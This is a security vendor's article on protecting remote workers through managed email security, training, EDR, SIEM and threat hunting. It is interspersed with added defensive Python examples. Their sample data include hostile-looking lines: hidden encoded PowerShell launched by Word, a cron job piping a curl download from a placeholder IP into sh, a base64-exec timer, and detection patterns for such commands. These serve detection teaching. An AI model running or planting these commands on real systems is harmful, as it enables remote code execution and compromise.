By RJ Friedman, Buchanan Technologies
Remote workers are no longer the exception. The COVID-19 pandemic revolutionized the corporate workforce almost overnight by prompting even businesses that had been resisting work-from-home (WFH) policies to adopt the remote model.
WFH was a quick fix for an unexpected problem, but it created a new one: how to properly secure home-based environments. Millions of employees suddenly needed to reach corporate data over hastily established connections, and the network perimeters companies had spent decades hardening essentially disappeared. Businesses had to find other ways to prevent unsafe user behavior such as visiting malicious websites or opening infected attachments.
Attackers took notice. The pandemic fueled a surge in cybercrime, and social engineering, always a problem, became an even bigger concern. According to Deloitte, 47% of individuals fall for a phishing scam while working at home.
With many employees now working from home, it’s never been more important for businesses to employ a layered cybersecurity approach with a combination of technology, best practices, and user awareness.
Protecting remote, distributed environments can be a complex and daunting affair for most businesses. Thankfully, you don't have to go it alone. Managed security service providers (MSSPs) offer comprehensive cloud-based services that address some or all of your cybersecurity needs.
More and more businesses rely on MSSPs for cyber protection. But not every MSSP offers all the protection you need or is the right fit for your business, so it pays to do your homework. When engaging an MSSP, look for a comprehensive offering that includes the following:
Email Security
Email security is one of the most important areas a business has to address to protect its data and networks. Email is the most common attack vector: phishing campaigns of varying sophistication constantly target users, and multiple industry reports put email in the chain of over 80% of successful cyber-attacks.
Securing email in a WFH environment isn't much different from securing it in the office, apart from the far larger number of sites to manage, and hardening it is a priority for any company. There are many email security vendors, so make sure your MSSP can explain how it selected its vendor: the product that stops the most unwanted mail, not the one with the best profit margin. Specifically, the service should at least include sandboxing of attachments, link protection (checking URLs at click time rather than only at delivery), and integration with the MSSP's SIEM. It should also be fully managed, including responding to and remediating threats that arrive by email, rather than handing you more work to do.
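To make the link-protection and attachment checks concrete, here is an added example (not code from the original article or from Buchanan) that parses a constructed sample message and reports the indicators a mail gateway would act on: visible link text that names one host while the href points at another, plain-HTTP links, and attachment types a sandbox would want to detonate. The message, addresses and domains are all constructed placeholders; the extension list is an assumption chosen for illustration.

```python
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message for illustration (not a real phishing email).
# All addresses and domains are placeholders from the reserved example.* space.
SAMPLE_EML = b"""\
From: "IT Helpdesk" <helpdesk@example.com>
To: employee@example.com
Subject: Action required: password expiry
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your password expires today. Sign in at
<a href="http://portal.example.net/login">https://portal.example.com/login</a></p>
<p>Policy: <a href="https://intranet.example.com/policy">https://intranet.example.com/policy</a></p>
</body></html>
--b1
Content-Type: application/octet-stream; name="invoice.docm"
Content-Disposition: attachment; filename="invoice.docm"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--b1--
"""

# Assumed list: extensions a sandbox would detonate (macro-enabled Office, script and container formats).
RISKY_ATTACHMENT_EXTS = {".docm", ".xlsm", ".pptm", ".js", ".vbs", ".hta", ".iso", ".lnk", ".exe", ".scr"}


class _LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def analyze_email(raw):
    """Return (finding_type, detail) pairs for the indicators a gateway would flag."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
            if ext in RISKY_ATTACHMENT_EXTS:
                findings.append(("risky_attachment", filename))
            continue
        if part.get_content_type() == "text/html":
            collector = _LinkCollector()
            collector.feed(part.get_content())
            for href, text in collector.links:
                # Visible text that looks like a URL but points at a different host is the
                # classic disguised link; click-time link protection is what catches it.
                if text.lower().startswith(("http://", "https://")) and _host(text) != _host(href):
                    findings.append(("link_text_mismatch", f"{text} -> {href}"))
                if urlparse(href).scheme == "http":
                    findings.append(("http_link", href))
    return findings


if __name__ == "__main__":
    for kind, detail in analyze_email(SAMPLE_EML):
        print(f"{kind:22} {detail}")
```

Run as-is it reports the disguised login link, the same link again for using plain HTTP, and the macro-enabled attachment. A real gateway does the same classification before sandboxing the attachment and rewriting the URL, which is the behaviour to ask an MSSP to demonstrate.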
Security Awareness Training
Attackers usually get into networks through phishing. Anti-phishing tools stop most attempts, but there is always a chance one slips by and tricks a well-intentioned user into opening an infected attachment or clicking a compromised URL. Users also interact daily with many other threat vectors: the phone, web browsing, USB devices, even Bluetooth. That is why user awareness is critical to cybersecurity, especially in today's WFH environment.
The most effective user awareness strategies are multichannel, with training delivered as email reminders, instructional videos, interactive online quizzes and games, and phishing simulations that single out users who need more help recognizing and reporting suspicious messages. Without addressing the human factor, no cybersecurity strategy is complete.
Endpoint Detection And Response
Endpoint Detection and Response (EDR) goes beyond traditional antivirus (AV), which relies primarily on malware signatures to prevent infection. EDR instead focuses on behavior: it continuously monitors and collects data from endpoints to identify and block suspicious or anomalous activity. Advanced endpoint protection is a must in today's WFH world because many users' endpoints now sit directly on the open internet rather than behind the corporate perimeter.
EDR looks at how code and processes behave and interact to decide whether they are acting suspiciously, for example an attachment that spawns a script to launch an attack or steal data. When EDR identifies a threat, it switches to response mode to stop, contain, or remove the threat and alert the security team.
For customers working with an MSSP, the provider’s security operations center (SOC) team would receive the alert and take appropriate action. An effective response team coordinates threat detection at the endpoint and network levels to minimize false positives and, in cases where customers also receive alerts, reduce the number of alerts to prevent “alert fatigue.”
Security Information And Event Management
While EDR secures endpoints, businesses also need to look for threats everywhere else in the environment. That is where security information and event management (SIEM) software comes in. A SIEM captures and aggregates log data from network devices, applications, host systems, and security controls across the environment and correlates it with threat intelligence sources to detect anomalies and potential attacks.
A SIEM issues alerts when it detects anomalies; the MSSP validates those alerts and, depending on the service agreement, may or may not respond to the attack on the client's behalf. A SIEM also has reporting capabilities that help with regulatory compliance by keeping detailed records of activity across the environment. A well-coordinated strategy routes EDR data into the SIEM for a comprehensive view, so ask a prospective MSSP whether it does this: a SIEM fed only by perimeter network logs cannot see what happens on endpoints that no longer sit behind that perimeter.
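The EDR and SIEM sections above describe three things in prose: a behavioural rule on the endpoint (an Office document spawning a script interpreter), a threat-intelligence match on network logs, and the value of feeding EDR data into the SIEM so the two layers can be correlated and duplicate alerts suppressed. The following added example (not code from the original article or any vendor product) does all three over constructed JSON-line telemetry. The hosts, users, the "threat-intel" domain and the ten-minute correlation window are assumptions chosen for illustration.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry: EDR process-creation events and web-proxy events as JSON lines.
# Hosts, users and the "threat-intel" domain are placeholders, not real indicators.
EVENTS = [
    r'{"ts":"2021-03-02T09:14:03Z","source":"edr","host":"LAPTOP-17","user":"jdoe","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAo"}',
    r'{"ts":"2021-03-02T09:14:09Z","source":"proxy","host":"LAPTOP-17","user":"jdoe","dest_host":"update-checker.example.net","url":"http://update-checker.example.net/stage2"}',
    r'{"ts":"2021-03-02T09:14:11Z","source":"edr","host":"LAPTOP-17","user":"jdoe","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAo"}',
    r'{"ts":"2021-03-02T09:20:00Z","source":"edr","host":"DESKTOP-02","user":"asmith","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -NoProfile -Command Get-Date"}',
    r'{"ts":"2021-03-02T09:21:00Z","source":"proxy","host":"DESKTOP-02","user":"asmith","dest_host":"intranet.example.com","url":"https://intranet.example.com/"}',
    r'{"ts":"2021-03-02T11:00:00Z","source":"edr","host":"SRV-01","user":"SYSTEM","parent_image":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -enc ZwBlAHQALQBkAGEAdABlAA=="}',
]

IOC_DOMAINS = {"update-checker.example.net"}   # constructed threat-intel feed (assumption)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
CORRELATION_WINDOW = timedelta(minutes=10)      # assumed window for linking endpoint and network hits


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _has_encoded_command(cmdline):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    # so test prefixes instead of one literal flag; -Encoding and -ExecutionPolicy do not match.
    return any("-encodedcommand".startswith(tok) for tok in cmdline.lower().split() if tok.startswith("-e"))


def endpoint_rules(ev):
    """Behavioural checks an EDR applies to a single process-creation event."""
    hits = []
    parent, image = _basename(ev.get("parent_image", "")), _basename(ev.get("image", ""))
    if parent in OFFICE_APPS and image in INTERPRETERS:
        hits.append("office_spawns_interpreter")   # e.g. a macro in an attachment launching a script
    if image == "powershell.exe" and _has_encoded_command(ev.get("cmdline", "")):
        hits.append("encoded_powershell")
    return hits


def network_rules(ev):
    """Threat-intelligence match a SIEM applies to a proxy or DNS event."""
    return ["ioc_domain_contact"] if ev.get("dest_host", "").lower() in IOC_DOMAINS else []


def correlate(lines):
    """Normalise both feeds, apply the rules, suppress repeats, and raise severity when one
    host shows endpoint and network indicators inside CORRELATION_WINDOW."""
    alerts, seen = [], set()
    for line in lines:
        ev = json.loads(line)
        layer = "endpoint" if ev["source"] == "edr" else "network"
        for rule in (endpoint_rules if layer == "endpoint" else network_rules)(ev):
            if (ev["host"], rule) in seen:      # same host, same rule: one alert, not a flood
                continue
            seen.add((ev["host"], rule))
            alerts.append({"ts": datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ"), "host": ev["host"],
                           "user": ev.get("user"), "rule": rule, "layer": layer, "severity": "medium"})
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append(a)
    for host_alerts in by_host.values():
        times = [a["ts"] for a in host_alerts]
        if {a["layer"] for a in host_alerts} == {"endpoint", "network"} and max(times) - min(times) <= CORRELATION_WINDOW:
            for a in host_alerts:
                a["severity"] = "high"
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a["ts"].isoformat(), a["severity"].upper(), a["host"], a["layer"], a["rule"])
```

Run as-is, LAPTOP-17 produces three alerts (Word spawning PowerShell, an encoded command, and a contact with the listed domain six seconds later) that are promoted to high because both layers fired on one host; the repeated Word-to-PowerShell event is suppressed rather than raised again; DESKTOP-02's ordinary PowerShell use produces nothing; and SRV-01's encoded command stays at medium because no network indicator corroborates it. That promotion is exactly what a network-only SIEM cannot do for a laptop that never touches the corporate perimeter.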
Threat Hunting
Also ask whether the MSSP does threat hunting: proactively searching for threats that have evaded your other defenses. Security experts agree that short of pulling the plug, no combination of defenses stops every attack. Advanced threat hunting supplements the other tools by continuously collecting and analyzing forensic data to determine whether anything running, or scheduled to run, anywhere in the environment has malicious capabilities. It fits into a layered, in-depth defense by producing intelligence that would otherwise be missed.
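A hunt over "anything scheduled to run" typically starts from an inventory of persistence entries (cron jobs, systemd timers, scheduled tasks) collected from every host, removes what matches a known-good baseline, and ranks what remains by how rare it is across the fleet and whether its command carries known-bad traits. The following added example (not code from the original article or any hunting product) does that over a constructed inventory; the hosts, entries, baseline and patterns are assumptions for illustration, and the IP address is from a reserved documentation range.

```python
import re
from collections import Counter

# Constructed inventory of persistence entries, as an agent might collect them from
# cron, systemd timers and scheduled tasks. Hosts, names and paths are placeholders;
# 203.0.113.10 is in the TEST-NET-3 documentation range.
INVENTORY = [
    {"host": "web-01", "kind": "cron", "name": "logrotate", "command": "/usr/sbin/logrotate /etc/logrotate.conf"},
    {"host": "web-01", "kind": "cron", "name": "backup",    "command": "/opt/backup/run.sh --nightly"},
    {"host": "web-02", "kind": "cron", "name": "logrotate", "command": "/usr/sbin/logrotate /etc/logrotate.conf"},
    {"host": "web-02", "kind": "cron", "name": "backup",    "command": "/opt/backup/run.sh --nightly"},
    {"host": "web-02", "kind": "cron", "name": "sysupdate", "command": "curl -s http://203.0.113.10/u.sh | sh"},
    {"host": "web-03", "kind": "cron", "name": "logrotate", "command": "/usr/sbin/logrotate /etc/logrotate.conf"},
    {"host": "web-03", "kind": "cron", "name": "backup",    "command": "/opt/backup/run.sh --nightly"},
    {"host": "web-03", "kind": "systemd-timer", "name": "cache-clean.timer",
     "command": "/usr/bin/python3 -c \"import base64;exec(base64.b64decode('cHJpbnQoMSk='))\""},
    {"host": "web-03", "kind": "cron", "name": ".hidden",   "command": "/tmp/.x/kd"},
]

# Assumed golden baseline: entries present on the approved image for this host class.
BASELINE = {
    ("cron", "logrotate", "/usr/sbin/logrotate /etc/logrotate.conf"),
    ("cron", "backup", "/opt/backup/run.sh --nightly"),
}

# Command traits worth a second look (assumed, illustrative set).
SUSPICIOUS_PATTERNS = [
    ("download_and_execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("encoded_payload",      re.compile(r"base64|frombase64string|-enc\b", re.I)),
    ("temp_or_hidden_path",  re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/|/\.[^/\s]+/")),
]


def hunt_persistence(inventory, baseline):
    """Return entries outside the baseline, rarest and most-flagged first, with fleet prevalence
    (an entry on 1 of 300 hosts deserves attention even if no pattern matches it)."""
    prevalence = Counter((e["kind"], e["name"], e["command"]) for e in inventory)
    hosts_total = len({e["host"] for e in inventory})
    findings = []
    for e in inventory:
        key = (e["kind"], e["name"], e["command"])
        if key in baseline:
            continue
        reasons = [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(e["command"])]
        findings.append({"host": e["host"], "kind": e["kind"], "name": e["name"], "command": e["command"],
                         "hosts_seen": prevalence[key], "hosts_total": hosts_total, "reasons": reasons})
    findings.sort(key=lambda f: (f["hosts_seen"], -len(f["reasons"])))
    return findings


if __name__ == "__main__":
    for f in hunt_persistence(INVENTORY, BASELINE):
        print(f"{f['host']:7} {f['kind']:14} {f['name']:18} seen on {f['hosts_seen']}/{f['hosts_total']} "
              f"hosts  {', '.join(f['reasons']) or 'no pattern match'}")
```

The three entries outside the baseline each appear on one host of three and each trips a different pattern: a download-and-execute cron job, an encoded Python payload hiding behind a benign-sounding timer name, and a binary in a hidden directory under /tmp. In practice the baseline comes from the golden image and the inventory is re-collected on a schedule, so the hunt keeps producing findings that no alert-driven control raised.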
WFH environments are here to stay. Post-pandemic, many businesses will keep at least some employees at home to save on overhead, and more than half of Americans (54%) want to continue working from home, according to Pew Research. Securing the remote workforce is therefore a long-term endeavor, and working with an MSSP is the way to go for many businesses. Find out how Buchanan can help you.